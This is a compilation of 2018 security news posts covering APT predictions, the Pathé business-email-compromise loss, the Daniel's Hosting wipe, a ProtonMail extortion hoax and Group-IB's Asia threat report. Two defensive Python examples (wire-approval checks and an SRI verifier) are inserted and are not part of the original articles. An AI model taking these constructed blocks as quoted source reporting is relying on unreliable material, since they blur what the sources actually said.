One example of how these versatile botnets can be used, other than for disruptive attacks, is in short-range frequency hopping for malicious communications, avoiding monitoring tools by bypassing conventional exfiltration channels.

Even though this seems to be a recurrent warning year after year, we should never underestimate IoT botnets – they keep growing stronger.

Public retaliation

One of the biggest questions in terms of diplomacy and geopolitics was how to deal with an active cyberattack. The answer is not simple and depends heavily on how bad and blatant the attack was, among many other considerations. However, it seems that after hacks like that on the Democratic National Committee, things became more serious.

Investigations into recent high-profile attacks, such as the Sony Entertainment Network hacks or the attack on the DNC, culminated in a list of suspects being indicted. That results not only in people facing trial but also a public show of who was behind the attack. This can be used to create a wave of opinion that might be part of an argument for more serious diplomatic consequences.

Actually we have seen Russia suffering such consequences as a result of their alleged interference in democratic processes. This might make others rethink future operations of this kind.

However, the fear of something like that happening, or the thought that it might already have happened, was the attackers’ biggest achievement. They can now exploit such fear, uncertainty and doubt in different, more subtle ways – something we saw in notable operations, including that of the Shadowbrokers. We expect more to come.

What will we see in the future? The propaganda waters were probably just being tested by past operations. We believe this has just started and it will be abused in a variety of ways, for instance, in false flag incidents like we saw with Olympic Destroyer, where it’s still not clear what the final objective was and how it might have played out.

Emergence of newcomers

Simplifying somewhat, the APT world seems to be breaking into two groups: the traditional well-resourced most advanced actors (that we predict will vanish) and a group of energetic newcomers who want to get in on the game.

The thing is that the entry barrier has never been so low, with hundreds of very effective tools, re-engineered leaked exploits and frameworks of all kinds publicly available for anyone to use. As an additional advantage, such tools make attribution nearly impossible and can be easily customized if necessary.

There are two regions in the world where such groups are becoming more prevalent: South East Asia and the Middle East. We have observed the rapid progression of groups suspected of being based in these regions, traditionally abusing social engineering for local targets, taking advantage of poorly protected victims and the lack of a security culture. However, as targets increase their defenses, attackers do the same with their offensive capabilities, allowing them to extend their operations to other regions as they improve the technical level of their tools. In this scenario of scripting-based tools we can also find emerging companies providing regional services who, despite OPSEC failures, keep improving their operations.

One interesting aspect worth considering from a more technical angle is how JavaScript post-exploitation tools might find a new lease of life in the short term, given the difficulty of limiting its functionality by an administrator (as opposed to PowerShell), its lack of system logs and its ability to run on older operating systems.

The negative rings

The year of Meltdown, Spectre, AMDFlaws and all the associated vulnerabilities (and those to come) made us rethink where the most dangerous malware actually lives. And even though we have seen almost nothing in the wild abusing vulnerabilities below Ring 0, the mere possibility is truly scary, as it would be invisible to almost all the security mechanisms we have.

For instance, in the case of SMM there has been a publicly available PoC since at least 2015. SMM (System Management Mode) is a CPU operating mode whose memory region (SMRAM) is inaccessible even to Ring 0 code, so malware running there would have full control of the machine while remaining invisible to the operating system and anything running on top of it. That makes us wonder whether the fact that we haven’t found any malware abusing this so far is simply because it is so difficult to detect. Abusing this feature seems too good an opportunity to ignore, so we are sure that several groups have been trying to exploit such mechanisms for years, maybe successfully.

We see a similar situation with virtualization/hypervisor malware and with UEFI malware. We have seen PoCs for both, and HackingTeam even revealed a UEFI persistence module that has been available since at least 2014, but again no real in-the-wild (ITW) examples as yet.

Will we ever find these kinds of unicorns? Or haven’t they been exploited yet? The latter possibility seems unlikely.

Your favorite infection vector

In probably the least surprising prediction of this article, we would like to say a few words about spear phishing. We believe that the most successful infection vector ever will become even more important in the near future. The key to its success remains its ability to spark the curiosity of the victim, and recent massive leaks of data from various social media platforms might help attackers improve this approach.

Data obtained from attacks on social media giants such as Facebook and Instagram, as well as LinkedIn and Twitter, is now available on the market for anyone to buy. In some cases, it is still unclear what kind of data was targeted by the attackers, but it might include private messages or even credentials. This is a treasure trove for social engineers, and could result in, for instance, an attacker using the stolen credentials of a close contact of yours to share something on social media that you already discussed privately, dramatically improving the chances of a successful attack.

This can be combined with traditional scouting techniques where attackers double-check the target to make sure the victim is the right one, minimizing the distribution of malware and its detection. In terms of attachments, it is fairly standard to make sure there is human interaction before firing off any malicious activity, thus avoiding automatic detection systems.

Indeed, there are several initiatives using machine learning to improve phishing’s effectiveness. It’s still unknown what the results would be in a real-life scenario, but what seems clear is that the combination of all these factors will keep spear phishing as a very effective infection vector, especially via social media in the months to come.

Destructive destroyer

Olympic Destroyer was one of the most famous cases of potentially destructive malware during the past year, but many attackers are incorporating such capabilities in their campaigns on a regular basis. Destructive attacks have several advantages for attackers, especially in terms of creating a diversion and cleaning up any logs or evidence after the attack, or simply as a nasty surprise for the victim.

Some of these destructive attacks have geostrategic objectives related to ongoing conflicts as we have seen in Ukraine, or with political interests like the attacks that affected several oil companies in Saudi Arabia. In some other cases they might be the result of hacktivism, or activity by a proxy group that’s used by a more powerful entity that prefers to stay in the shadows.

Anyway, the key to all these attacks is that they are ‘too good’ not to use. In terms of retaliation, for instance, governments might use them as a response that sits somewhere between a diplomatic answer and an act of war, and indeed some governments are experimenting with them. Most of these attacks are planned in advance, which involves an initial stage of reconnaissance and intrusion. We don’t know how many potential victims are already in this situation where everything is ready, just waiting for the trigger to be pulled, or what else the attackers have in their arsenal waiting for the order to attack.

ICS environments and critical infrastructure are especially vulnerable to such attacks, and even though industry and governments have put a lot of effort in over the last few years to improve the situation, things are far from ideal. That’s why we believe that even though such attacks will never be widespread, in the next year we expect to see some occurring, especially in retaliation to political decisions.

Advanced supply chain

This is one of the most worrisome vectors of attack, which has been successfully exploited over the last two years, and it has made everyone think about how many providers they have and how secure they are. Well, there is no easy answer to this kind of attack.

Even though this is a fantastic vector for targeting a whole industry (similar to watering hole attacks) or even a whole country (as seen with NotPetya), it’s not that good when it comes to more targeted attacks as the risk of detection is higher. We have also seen more indiscriminate attempts like injecting malicious code in public repositories for common libraries. The latter technique might be useful in very carefully timed attacks when these libraries are used in a very particular project, with the subsequent removal of the malicious code from the repository.

Now, can this kind of attack be used in a more targeted way? It appears to be difficult in the case of software because it will leave traces everywhere and the malware is likely to be distributed to several customers. It is more realistic in cases when the provider works exclusively for a specific customer.

What about hardware implants? Are they a real possibility? There has been some recent controversy about that. Even though we saw from Snowden’s leaks how hardware can be manipulated on its way to the customer, this does not appear to be something that most actors can do other than the very powerful ones. And even they will be limited by several factors.

However, in cases where the buyer of a particular order is known, it might be more feasible for an actor to try and manipulate hardware at its origin rather than on its way to the customer.

It’s difficult to imagine how all the technical controls in an industrial assembly line could be circumvented and how such manipulation could be carried out. We don’t want to discard this possibility, but it would probably entail the collaboration of the manufacturer.

All in all, supply chain attacks are an effective infection vector that we will continue to see. In terms of hardware implants, we believe it is extremely unlikely to happen, and if it does, we will probably never know.

And mobile

This is in every year’s predictions. Nothing groundbreaking is expected, but it’s always interesting to think about the two speeds for this slow wave of infections. It goes without saying that all actors have mobile components in their campaigns; it makes no sense only going for PCs. The reality is that we can find many examples of artifacts for Android, but also a few improvements in terms of attacking iOS.

Even though successfully infecting an iPhone requires chaining several 0-days, it’s always worth remembering that incredibly well-resourced actors can pay for such technology and use it in critical attacks. Some private companies claim they can access any iPhone that they physically possess. Other less affluent groups can find creative ways to circumvent security on such devices, for instance by setting up rogue MDM servers and persuading targets through social engineering to enroll their devices, which gives the attackers the ability to install malicious applications.

It will be interesting to see if the boot code for iOS leaked at the beginning of the year will provide any advantage to the attackers, or if they’ll find new ways of exploiting it.

In any case, we don’t expect any big outbreak when it comes to mobile targeted malware, but we expect to see continuous activity by advanced attackers aimed at finding ways to access their targets’ devices.

The other things

What might attackers be thinking about in more futuristic terms? One of the ideas, especially in the military field, might be to stop using weak, error-prone humans and replace them with something more mechanical. With that in mind, and also thinking of the alleged GRU agents expelled from the Netherlands last April after trying to hack into the OPCW’s Wi-Fi network as an example, what about using drones instead of human agents for short-range hacking?

Or what about backdooring some of the hundreds of cryptocurrency projects for data gathering, or even financial gain?

Use of any digital good for money laundering? What about using in-game purchases and then selling such accounts later in the marketplace?

There are so many possibilities that predictions always fall short of reality. The complexity of the environment cannot be fully understood anymore, raising possibilities for specialist attacks in different areas. How can a stock exchange’s internal inter-banking system be abused for fraud? I have no idea, I don’t even know if such a system exists. This is just one example of how open to the imagination the attackers behind these campaigns are.

We are here to try and anticipate, to understand the attacks we don’t yet understand, and to prevent them from occurring in the future.

Full report “Kaspersky Security Bulletin: Threat Predictions for 2019” (English, PDF)



Securelist

SecurityWeek RSS Feed: TalkTalk Hackers Sentenced to Prison

Two individuals were sentenced to prison on Monday for their roles in the 2015 hacking of British telecoms company TalkTalk.

Connor Allsopp, 21, and Matthew Hanley, 23, both from Tamworth, Staffordshire, pleaded guilty to hacking-related charges last year. Allsopp has been sentenced to 8 months in jail and Hanley to 12 months.



SecurityWeek RSS Feed

Third parties: Fast-growing risk to an organization’s sensitive data

The Ponemon Institute surveyed more than 1,000 CISOs and other security and risk professionals across the US and UK to understand the challenges companies face in protecting sensitive and confidential information shared with third-party vendors and partners. According to the findings, 59 percent of companies said they have experienced a data breach caused by one of their vendors or third parties. In the U.S., that percentage is even higher at 61 percent — up 5 … More

The post Third parties: Fast-growing risk to an organization’s sensitive data appeared first on Help Net Security.

Business email compromise scam costs Pathé $21.5 million

Recently released court documents show that European-based cinema chain Pathé lost a small fortune to a business email compromise (BEC) scam in March 2018. How much? An astonishing US$21.5 million (roughly 19 million euros). The attack, which ran for about a month, cost the company 10 percent of its total earnings.

What is business email compromise?

Business email compromise is a type of phishing attack, sprinkled with a dash of targeted social engineering. A scammer pretends to be an organisation’s CEO, then starts bombarding the CFO with urgent requests for a money transfer. The requests are generally for wire transfers (hard to trace), and are often routed through Hong Kong (lots of wire transfers, even harder to trace).

Scammers will sometimes buy domain names to make the fake emails look even more convincing. These attacks rely on the social importance of the CEO: nobody wants to question the boss. If an organisation has no safeguards in place against these attacks, a scammer will likely be very rich indeed. It only takes one successful scam to generate a huge haul, at which point the scammer simply vanishes into the ether.

What happened here?

This particular BEC scam is of interest because it highlights a slightly different approach to the attack. Scammers abandoned pitting the fake CEO against the real CFO in favour of faking French head office missives to the Dutch management.

It all begins with the following mail:

“We are currently carrying out a financial transaction for the acquisition of foreign corporation based in Dubai. The transaction must remain strictly confidential. No one else has to be made aware of it in order to give us an advantage over our competitors.”

Even though the CFO and CEO thought it strange, they pressed on regardless and sent over 800,000 euros. More requests followed, including some while the CFO was on vacation—both executives were fired after the head office noticed. Although they weren’t involved in the fraud, Pathé said they could—and should—have noticed the “red flags.” They didn’t, and there was no safety net in place, so the business email compromise attempt was devastatingly successful.

The shame game

Many instances of BEC fraud go unreported because nobody wants to voluntarily admit they fell victim. As a result, the first you tend to hear about it is in court proceedings. It’s hard to guess how much is really lost to BEC fraud, but the FBI has previously floated a $2.1 billion figure. The actual figure could easily be higher.

How can businesses combat this?

  1. Check the social media accounts and other online portals of your executives, and have those connected to finance make their profiles as private—and secure—as possible. You can certainly reduce a CFO’s online footprint, even if you can’t remove it completely.
  2. Authentication is key. The CFO and CEO, or whoever is responsible for wire authorisation, should have a special process in place for approvals. It shouldn’t be email based, as that’s how people end up in BEC scam trouble in the first place. If you have a unique, secure method of communication, then use it. If you can lock down approvals with additional security like two-factor authentication, then do so. Some organisations make use of bespoke, offline authenticator apps on personal devices. The solution is out there!
  3. If you have many offices, and different branches move money around independently, the same rules apply: find a consistent method of authentication that can be used across multiple locations. This would have almost certainly saved Pathé from losing $21.5 million.
  4. When there’s no other way to lock things down, it’s time to break out the telephone and rely on verbal authentication. While this may cause a small amount of business drag (if you’re on the other side of the world, is your CFO fielding calls at 2:00am?), it’s better than losing everything.
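The approval rules in points 2 to 4 above, as an added example that is not from the original post: a small Python policy check for wire approvals that refuses email-originated approvals, verifies a one-time code from an offline authenticator (RFC 6238 TOTP over HMAC-SHA1), and demands a logged phone callback above an amount threshold. The approver name, the threshold, the channel names and the sample request are constructed for illustration; the TOTP secret is the RFC 6238 test key.

```python
import hashlib
import hmac
import struct
from dataclasses import dataclass

# Approval channels that are acceptable. Email is deliberately absent:
# an approval that arrives by email is exactly what a BEC scammer forges.
TRUSTED_CHANNELS = {"approval_portal", "authenticator_app"}

# Above this amount (constructed threshold, in euros) a phone callback to
# the approver on a known number is required in addition to the OTP.
CALLBACK_THRESHOLD_EUR = 100_000


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, dynamic truncation."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with the counter derived from the current time step."""
    return hotp(secret, unix_time // step, digits)


def otp_matches(secret: bytes, code: str, unix_time: int, step: int = 30) -> bool:
    """Accept the current step and one step either side to tolerate clock drift."""
    counter = unix_time // step
    return any(hmac.compare_digest(hotp(secret, c), code)
               for c in (counter - 1, counter, counter + 1))


@dataclass
class WireRequest:
    request_id: str
    amount_eur: int
    request_channel: str      # how the payment request itself arrived


@dataclass
class Approval:
    approver: str
    channel: str              # how the approval was given
    otp: str                  # 6-digit code from the approver's offline authenticator
    callback_confirmed: bool  # finance called the approver back on a known number


class WireApprovalPolicy:
    """Out-of-band, two-factor approval policy for outgoing wire transfers."""

    def __init__(self, approver_secrets: dict[str, bytes]) -> None:
        # Map of authorised approver -> shared TOTP secret (enrolled out of band).
        self.approver_secrets = approver_secrets

    def evaluate(self, req: WireRequest, appr: Approval, now: int) -> tuple[bool, str]:
        """Return (approved, reason). Every failure names the rule that blocked it."""
        if appr.channel not in TRUSTED_CHANNELS:
            return False, f"approval via '{appr.channel}' is not accepted; use the approval portal"
        secret = self.approver_secrets.get(appr.approver)
        if secret is None:
            return False, f"'{appr.approver}' is not an authorised approver"
        if not otp_matches(secret, appr.otp, now):
            return False, "one-time code does not match the approver's authenticator"
        if req.amount_eur >= CALLBACK_THRESHOLD_EUR and not appr.callback_confirmed:
            return False, (f"amount {req.amount_eur} EUR exceeds {CALLBACK_THRESHOLD_EUR} EUR; "
                           "verbal confirmation by phone callback required")
        return True, "approved"


# Constructed sample: one approver whose secret is the RFC 6238 test key,
# and a request shaped like the Pathé case (a large transfer asked for by email).
SAMPLE_SECRET = b"12345678901234567890"
POLICY = WireApprovalPolicy({"cfo": SAMPLE_SECRET})
SAMPLE_REQUEST = WireRequest("WT-0001", 800_000, "email")


def demo(now: int = 59) -> list[tuple[bool, str]]:
    """Run the sample request through the policy with several approvals."""
    code = totp(SAMPLE_SECRET, now)   # what the offline authenticator would show
    approvals = [
        Approval("cfo", "email", code, True),               # approval "replied" by email
        Approval("cfo", "approval_portal", "000000", True), # wrong or guessed code
        Approval("cfo", "approval_portal", code, False),    # no callback on a big transfer
        Approval("cfo", "approval_portal", code, True),     # everything in order
    ]
    return [POLICY.evaluate(SAMPLE_REQUEST, a, now) for a in approvals]


if __name__ == "__main__":
    for ok, reason in demo():
        print("APPROVED" if ok else "REJECTED", "-", reason)
```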

A threat worth tackling

Business email compromise continues to grow in popularity among scammers, and it’s up to all of us to combat it. If your organisation doesn’t take BEC seriously, you could easily be on the receiving end of an eye-watering phone call from your bank manager. Keeping your finances in the black is a priority, and BECs are one of the most insidious threats around, whether you distribute movies, IT services, or anything else for that matter. Don’t let malicious individuals decide when to call things a wrap.

The post Business email compromise scam costs Pathé $21.5 million appeared first on Malwarebytes Labs.

In a post-EMV world, fraud is shifting from in-person to ecommerce channels

Three years after the switch to new chip-based credit and debit cards, a study by the National Retail Federation and Forrester says payment card fraud is still a top concern for large U.S. retailers as criminals move their activities online. “The implementation of EMV chip cards and chip card readers was supposed to dramatically reduce credit and debit card fraud,” the State of Retail Payments report said. “So why is fraud still the top concern … More

The post In a post-EMV world, fraud is shifting from in-person to ecommerce channels appeared first on Help Net Security.

6,500+ sites deleted after Dark Web hosting provider Daniel’s Hosting hack

On Thursday, November 15, hackers compromised Daniel’s Hosting, one of the largest Dark Web hosting providers, and deleted 6,500+ sites.

On Thursday, November 15, hackers compromised Daniel’s Hosting, one of the largest Dark Web hosting providers. The news was confirmed by Daniel Winzen, the software developer behind the hosting service.

Daniel’s Hosting became the largest Dark Web hosting provider earlier in 2017, when Anonymous members breached and took down Freedom Hosting II.

More than 6,500 Dark Web services hosted on the platform were completely deleted, and the bad news is that they cannot be recovered: by the operator’s design choice, there are no backups.


Winzen explained that the hackers broke into the Daniel’s Hosting database and deleted all data. A PHP zero-day exploit had been leaked just a day before the hack, but that flaw was already fixed in commit db626a54a4f5, so the attackers likely used other flaws.

“On November 15th around 10-11 PM UTC the hosting server got hacked. As per my analysis it seems someone got access to the database and deleted all accounts.” Winzen wrote on the DH website today.

“Noteworthy, also the account “root” has been deleted. To this day around 6500 Hidden Services were hosted on the server. There is no way to recover from this breach, all data is gone. I might re-enable the service once the vulnerability has been found, but right now I first need to find it.” 

Winzen is assessing the platform, searching for vulnerabilities that the attackers might have exploited to compromise the server.

“As of now I haven’t been able to do a full analysis of the log files and need to further analyze them, but based on my findings so far I believe that the hacker has only been able to gain administrative database rights. There is no indication of having had full system access and some accounts and files that were not part of the hosting setup were left untouched,” Winzen told ZDNet.

“I might re-enable the service once the vulnerability has been found, but right now I first need to find it.”

The source code of the Daniel’s Hosting platform has been available as open source on GitHub, a circumstance that might have helped the attackers review the code and find zero-day flaws to exploit.

Who is the culprit?

It is very hard to attribute the attack to specific threat actors: cybercrime syndicates, nation-state hackers, and intelligence and law enforcement agencies are all possible suspects with valid motivations.

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post 6,500+ sites deleted after Dark Web hosting provider Daniel’s Hosting hack appeared first on Security Affairs.

Security Affairs newsletter Round 189 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online with a special deal

20% discount

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

· CVE-2018-15961: Adobe ColdFusion Flaw exploited in attacks in the wild
· Linux Cryptocurrency miner leverages rootkit to avoid detection
· A critical flaw in GDPR compliance plugin for WordPress exploited in the wild
· Elon Musk BITCOIN Twitter scam, a simple and profitable fraud for crooks
· France seeks Global Talks on Cyberspace security and a code of good conduct
· Hacking the hackers – IoT botnet author adds his own backdoor on top of a ZTE router backdoor
· Reading the Android Ecosystem Security Transparency Report
· Cathay Pacific waited six months before disclosing the security breach
· Expert found a way to bypass Windows UAC by mocking a trusted directory
· Google Services down due to BGP leak, traffic hijacked through Russia, China, and Nigeria
· Microsoft’s Patch Tuesday updates for November 2018 fix actively exploited Windows flaw
· Operation Shaheen – Pakistan Air Force members targeted by nation-state attackers
· Adobe Patch Tuesday updates for November 2018 fix known Acrobat flaw
· Boffins discovered seven new Meltdown and Spectre attacks
· Cyber espionage group used CVE-2018-8589 Windows Zero-Day in Middle East Attacks
· Facebook flaw could have exposed private info of users and their friends
· The ‘MartyMcFly’ investigation: Italian naval industry under attack
· Chinese TEMP.Periscope cyberespionage group was using TTPs associated with Russian APTs
· Congress passes bill that creates new Cybersecurity and Infrastructure Security Agency at DHS
· Kaspersky Lab opens first Transparency Center in Zurich
· Pwn2Own Tokyo 2018 – iPhone X exploits paid over $100,000
· Senior German officials want to exclude Chinese firms from building 5G infrastructure
· Cybaze ZLab-Yoroi team spotted a new variant of the APT28 LoJax rootkit
· Group-IB presented latest cybercrime and nation-state hacking trends in Asia
· tRat is a new modular RAT used by the threat actor TA505
· Two hacker groups attacked Russian banks posing as the Central Bank of Russia
· Using Microsoft PowerPoint as Malware Dropper
· Japanese government’s cybersecurity strategy chief has never used a computer
· New set of Pakistani banks card dumps goes on sale on the dark web
· Protonmail hacked …. a very strange scam attempt

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 189 – News of the week appeared first on Security Affairs.

SecurityWeek RSS Feed: Suspected Russian Hackers Impersonate State Department Aide

WASHINGTON (AP) — U.S. cybersecurity experts say hackers impersonating a State Department official have targeted U.S. government agencies, businesses and think tanks in an attack that bears similarity to past campaigns linked to Russia.

The “spear phishing” attempts began on Wednesday, sending e-mail messages purporting to come from a department public affairs official.


Protonmail hacked …. a very strange scam attempt

A hacker going by the online moniker AmFearLiathMor is claiming to have hacked ProtonMail, the most popular end-to-end encrypted email service.

At this time it is not clear whether the hacker belongs to a cybercrime gang; they claim to have stolen a “significant” amount of data from the company.

The ransom demand (archive.is link) was posted on Pastebin. The hacker claims to have compromised users’ email and also accuses ProtonMail of sending users’ decrypted data to American servers.

AmFearLiathMor also wrote that ProtonMail hasn’t configured Subresource Integrity (SRI), which the hacker calls mandatory, claiming this allows tampering and data collection.

“We hacked Protonmail and have a significant amount of their data from the past few months.  We are offering it back to Protonmail for a small fee, if they decline then we will publish or sell user data to the world.” wrote the hacker.

“While Protonmail’s open-source code can be freely audited on Github, they haven’t configured the mandatory SRI feature (https://www.w3.org/TR/SRI/). This leaves users without any guarantee about their source code integrity, thus allowing tampering and data collection at anytime. This will be totally transparent and unnoticed, because without enabling SRI all the users should inspect the website runtime code and its connections manually in the same moment they’re being tampered with by Protonmail to discover it.”

“Incidentally during this period we noticed that Protonmail sends decrypted user data to American servers frequently.  This may be due to the Swiss MLAT treaty requiring swiss companies reveal all their data to the Americans.  However it also might be possible they are sending this decrypted user data to the American firm that owns them.  This was simply a surprising thing to note but did not significantly influence our operation.” added the hacker.
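The SRI claim quoted above is worth unpacking on its own, because the mechanism is real even if the extortion is not. An `integrity` attribute on a `<script>` or `<link>` tag carries a base64 digest; the browser hashes the fetched bytes and refuses to run the resource when the digest does not match. The following is an added example (not ProtonMail code, nor the hacker's) that generates such attributes at build time and reproduces the browser-side check, including the rule that only the strongest algorithm family present in the attribute counts. The sample script body and its tampered variant are constructed for the demonstration.

```python
"""Subresource Integrity (SRI, W3C): generate integrity values and check fetched bytes.

Added example, not code from the article or from ProtonMail. `sri_matches` follows
the check a browser performs for an `integrity` attribute: tokens are whitespace
separated, unsupported tokens are ignored, only the strongest supported algorithm
present is considered, and the body must match at least one digest of that family.
"""
import base64
import hashlib
import hmac

ALLOWED = {"sha256": 1, "sha384": 2, "sha512": 3}   # SRI algorithms, ranked by strength


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Return the `algo-<base64 digest>` token used in an integrity attribute."""
    if algo not in ALLOWED:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def sri_matches(body: bytes, integrity: str) -> bool:
    """Browser semantics for an integrity attribute against the bytes actually received."""
    tokens = []
    for tok in integrity.split():
        algo, _, rest = tok.partition("-")
        b64 = rest.split("?", 1)[0]            # drop any option expression after '?'
        if algo in ALLOWED and b64:
            tokens.append((algo, b64))
    if not tokens:
        return True                            # no usable token: the attribute imposes nothing
    best = max(ALLOWED[a] for a, _ in tokens)
    for algo, b64 in tokens:
        if ALLOWED[algo] != best:
            continue                           # weaker families are ignored when a stronger one is present
        if hmac.compare_digest(sri_hash(body, algo).encode(), f"{algo}-{b64}".encode()):
            return True
    return False


def script_tag(src: str, body: bytes) -> str:
    """Emit the tag a build step would write once the final bundle bytes are known."""
    return f'<script src="{src}" integrity="{sri_hash(body)}" crossorigin="anonymous"></script>'


# Constructed sample: the bundle as published, and the same bundle with one line changed.
ORIGINAL = b"window.decryptMessage = function (m) { return openpgp.decrypt(m); };\n"
TAMPERED = b"window.decryptMessage = function (m) { log(m); return openpgp.decrypt(m); };\n"

if __name__ == "__main__":
    tag = script_tag("https://cdn.example/app.js", ORIGINAL)   # hypothetical CDN host
    print(tag)
    print(sri_matches(ORIGINAL, sri_hash(ORIGINAL)), sri_matches(TAMPERED, sri_hash(ORIGINAL)))  # True False
```

The caveat a reviewer would add to the hacker's argument: SRI binds a resource to the HTML that references it, so it protects against a modified file on a third-party host or a CDN. When the same origin serves both the page and the script, whoever controls that origin can update the digest along with the file, so SRI offers no guarantee against the site operator itself; it is a supply-chain control, not an audit of the operator.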

ProtonMail denied having been hacked and added that this is just a hoax.

Below is ProtonMail’s reply in a Reddit thread:

“This extortion attempt is a hoax and we have seen zero evidence to suggest otherwise.” states the company.

“A closer reading of some of the claims, e.g. “circumventing the Geneva convention, underwater drone activities in the Pacific Ocean, and possible international treaty violations in Antarctica”, etc, should also cause a reasonable observer to draw the same conclusion.”

ProtonMail confirmed that it is aware of a limited number of accounts that were compromised, likely through credential stuffing or phishing attacks, but ruled out any breach of its systems.

“As many of you may be aware, earlier today, criminals attempted to extort ProtonMail by alleging a data breach, with zero evidence. An internal investigation turned up two messages from the criminals involved, which again repeated the allegations with zero evidence, and demanded payment. We have no indications of any breach from our internal infrastructure monitoring.” wrote the company.

“Like any good conspiracy theory, it is impossible to disprove a breach. On the other hand, a breach can be easily proven by providing evidence. The lack of evidence strongly suggests there is no breach, and this is a simple case of online extortion.”


The hackers are claiming they have data on Michael Avenatti and CNN employees.

The hacker is also offering $20 USD in bitcoin for spreading info about the alleged hack using the #Protonmail hashtag on Twitter.

This is a very strange and anomalous scam attempt: the hackers used a mix of appealing information and political data. Why mention Avenatti in a scam attempt? Is it a message to someone? Why did the hackers not publish a sample of the stolen data?

Stay Tuned…

Pierluigi Paganini

(Security Affairs – Protonmail, hacking)

The post Protonmail hacked …. a very strange scam attempt appeared first on Security Affairs.

Group-IB presented latest cybercrime and nation-state hacking trends in Asia

According to the findings of Group-IB’s latest report, Asia is one of the most actively attacked regions in the world. The company presented the latest cybercrime trends at a conference in Hong Kong.

Hong Kong, 16.11.2018 – Group-IB, an international company that specializes in preventing cyber attacks, presented the findings of its latest Hi-Tech Crime Trends 2018 report at the FinTech Security Conference in Hong Kong organized by Binary Solutions Limited in partnership with Group-IB.

According to Group-IB’s report findings, Asia is one of the most actively attacked regions in the world. Over the past year, 21 state-sponsored groups were detected in the area, which is more than in Europe and the US combined. Hong Kong, Singapore, Seoul, and Shanghai, and many other financial powerhouses in Asia are likely to become primary targets of financially motivated hacker groups in the near future.

“Cyber trends and threats that we identified in the world are likely to occur in Asia. Asia’s rapid economic growth has ramped up the interest of financially motivated hackers and state-sponsored hacker groups. Local banks have already been attacked by advanced hacker groups several times; we expect this trend to increase,” – comments Dmitry Volkov, Group-IB CTO.

“The threats that are notable for the Asian region are represented by a significant number of attacks aimed at the manufacturing of chips, microprocessors and system control boards of different IT vendors, whose principal manufacturing operations are located in Asia. The attackers’ research vector is now shifting from software vulnerabilities to those located at the hardware and firmware level. To exploit certain hardware vulnerabilities, hackers can simply run JavaScript code, as in the case of the Glitch vulnerability. It is very difficult, if not impossible, to eliminate these vulnerabilities with software updates, and as such they create new opportunities for cybercriminals. It is likely that in the space of a few years they will seriously affect the cyber security market.”

Since the beginning of 2018, Group-IB experts detected that cybercriminals were seeking to get access to the user databases of Hong Kong state Internet portals responsible for taxes, trade, procurement, logistics, innovations and hi-tech infrastructure.

Espionage as one of the main APT groups’ goals

The threat landscape for critical infrastructure is growing more complex, driven by the activity of state-sponsored threat actors who seek to establish a sustained presence within critical infrastructure networks for long-term espionage or sabotage. These groups target companies in the energy, financial, aviation, water and other sectors. Banks are considered an integral part of critical infrastructure, which is why the availability of tools and experience in disrupting bank systems is now a priority for attackers. Such tools are actively used by two groups in particular: BlackEnergy and Lazarus.

To infiltrate critical infrastructure networks, hackers will continue to use phishing as one of their main tools, but the focus of attacks might shift to vulnerable network equipment connecting the network to the Internet. APT groups will keep investing heavily in the development and acquisition of zero-day exploits, according to Group-IB’s forecasts. Another trend Group-IB experts identified is network compromise through key personnel’s home networks and personal devices. Increasingly often, state-sponsored hackers are focusing on vulnerabilities in home routers. This allows them not only to spy on users without infecting their devices, but also to maintain a more extensive and dynamic infrastructure and remain unnoticed.

Group-IB’s new report features the activity of roughly 40 state-sponsored groups around the world, 21 of which were most active in Asia-Pacific, including the infamous North Korean Lazarus group. For some of the hacker groups detected, the country of origin is yet to be established. Attribution is sometimes complicated by the fact that some groups may imitate other groups’ unique features to throw researchers off track.

Attacks on Crypto

In 2017-2018 hackers’ interest in cryptocurrency exchanges ramped up. Thirteen exchanges were hacked in 2017 and in the first three quarters of 2018, amounting to a total loss of $877 million. Some 60% of that total was stolen from Coincheck, a Japanese cryptocurrency exchange. Silence, MoneyTaker and Cobalt are likely to conduct new attacks on crypto exchanges.

A relatively new method of fraud on the ICO market was stealing an ICO project’s white paper and presenting the identical idea under a new brand name. Spear phishing remains the major attack vector: approximately 56% of all money siphoned off from ICOs was stolen using phishing.

In 2018 Group-IB detected five successful “51% attacks”, when attackers take control over at least 51% of mining power. Having 51% of computing power, the attackers create a stealthy alternative blockchain to confirm their own transactions. In 2018 the direct financial losses from these attacks amounted to almost $20 million.

Attacks on banks and their clients

The advanced hacker groups that Group-IB identifies as most dangerous to the banking sector worldwide are Lazarus, MoneyTaker, Cobalt and Silence. The latter three are led by Russian-speaking hackers. All these groups are able not only to penetrate a bank’s network and access isolated financial systems, but also to withdraw money via SWIFT, card processing systems, and ATMs. The Lazarus group will continue to attack banks and steal funds via SWIFT. They will likely experiment with attacks on card processing, primarily focusing on Asia and the Pacific. New cybercrime groups are also expected to start operations in Asia and Latin America.

The number of attacks via SWIFT increased dramatically over the reviewed period. In the previous period, three such attacks were tracked, in Hong Kong, Ukraine, and Turkey. In this period, however, 9 successful attacks have already taken place in Nepal, Taiwan, Russia, Mexico, India, Bulgaria, and Chile. Only two hacker groups target the SWIFT interbank transfer system: Lazarus and Cobalt. The average volume of a theft attempt via SWIFT is estimated at $26 million.

Group-IB marked six new PC Trojans that appeared internationally: IcedID, BackSwap, DanaBot, MnuBot, Osiris and Xbot. Web phishing, another popular attack vector, has grown globally. Financial phishing predictably targets mainly US-based companies; the corresponding share of financial phishing webpages is 26%. France and Germany are second and third, respectively, in this ranking. Among all phishing resources, 73% fall into the following categories: cloud storage (28%), financial platforms (26%), and online services (19%).

